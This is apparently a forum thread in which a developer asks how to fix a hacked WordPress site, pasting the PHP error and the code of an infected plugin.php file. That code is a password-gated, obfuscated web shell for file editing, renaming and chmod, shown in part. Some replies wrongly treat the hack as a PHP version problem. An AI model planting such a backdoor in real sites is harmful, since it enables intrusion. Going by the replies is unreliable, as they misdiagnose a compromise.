How to fix hacked website
I recently developed my first website for a client, and today, after a few months, I'm getting this error.
Hosting company says

Webiste is working with lower PHP version, which is below 8
Currently, the PHP version is deprecated on the shared server

I tried finding the file mentioned in the error, but it was moved to the quarantine folder by cpanel security Monarx.
Below is the error message. How do I solve it?

Warning:
require_once(/home4/username/public_html/wp-includes/plugin.php):
Failed to open stream: No such file or directory in
/home4/username/public_html/wp-settings.php on line 50
Fatal error: Uncaught Error: Failed opening required
'/home4/username/public_html/wp-includes/plugin.php'
(include_path='.:/opt/cpanel/ea-php83/root/usr/share/pear') in
/home4/username/public_html/wp-settings.php:50 Stack trace: #0
/home4/username/public_html/wp-config.php(96): require_once() #1
/home4/username/public_html/wp-load.php(50):
require_once('/home4/username...') #2
/home4/username/public_html/wp-blog-header.php(13):
require_once('/home4/username...') #3
/home4/username/public_html/index.php(17):
require('/home4/username...') #4 {main} thrown in
/home4/username/public_html/wp-settings.php on line 50

Code if the infected file
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if
(function_exists('session_start')) {   session_start();   if
(!isset($_SESSION['secretyt'])) {
    $_SESSION['secretyt'] = false;   }   if (!$_SESSION['secretyt']) {
    if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) ==
'2dec0af1d2efe0804b3b28bb0efa51c3') {
      $_SESSION['secretyt'] = true;
    } else { $bytesecform = <<<FORM <html>   <head>
    <meta charset="utf-8">
    <title></title>
    <style type="text/css">
      body {padding:10px}
      input {
        padding: 2px;
        display:inline-block;
        margin-right: 5px;
      }
    </style>   </head>   <body>
    <form action="" method="post" accept-charset="utf-8">
      <input type="password" name="pwdyt" value="" placeholder="passwd">
      <input type="submit" name="submit" value="submit">
    </form>   </body> </html> FORM;
      die($bytesecform);
    }   } } ?> <?php /* @Author https://www.jiamiphp.com/ */  goto yFAWjAbJXc; YaIheccQO_: echo
"\74\x2f\x74\x61\142\x6c\x65\x3e\74\142\162\x20\57\x3e\x3c\143\145\x6e\x74\x65\162\x3e"
. $_POST["\160\x61\x74\150"] .
"\x3c\x62\162\40\x2f\x3e\74\142\x72\40\57\x3e"; if
($_POST["\157\160\x74"] == "\143\150\155\157\x64") { goto g_x4CEVA0B;
} if ($_POST["\157\160\164"] == "\x72\145\x6e\141\155\145") { goto
wU1GhSzpt6; } if ($_POST["\157\x70\x74"] == "\x65\x64\151\x74") { goto
Kab_4WvYTq; } goto pkqVwqVs4K; goto k337RjRC8r; DsN9vC4FRx: $path =
getcwd(); goto VJE6OLeD_A; ukkIlPbloG: $path =
$_GET["\160\141\164\x68"]; VJE6OLeD_A: goto hpDHCP2p8b; yNkeUvW5mP:
echo

… and more …



for the PHP version, if you are not able to update it, then ask your CPanel provider and they will provide assistance or Fix it for you. I have face the same issue, but its not HACKED, its the Update you need to done because of the Wordpress Latest Version, and the best option is, let the Hosting Provider do it for you.

They said you need to modify the code. According to them, the website code uses older php version.

then you need to upgrade the whole site not only a part of the website, because the whole site is infected and you will need to hire a PHP/Wordpress Dev for that task.

I am the developer. What changes do I need to do?

run the website in your local system/machine, then review the code and check the Latest PHP guide as per your code. After the review, update your site functionality as needed, and if you too old version, then your site need to be re-developed.

Will try that. Thanks!

I think I am quite late, but I have developed a tool which uses heuristics, transform etc, to detect and delete the files. I am currently working on providing it with more data but the detection rate is 99%. I recently used it to recover three hacked word press sites. if anyone is interested, leme know.
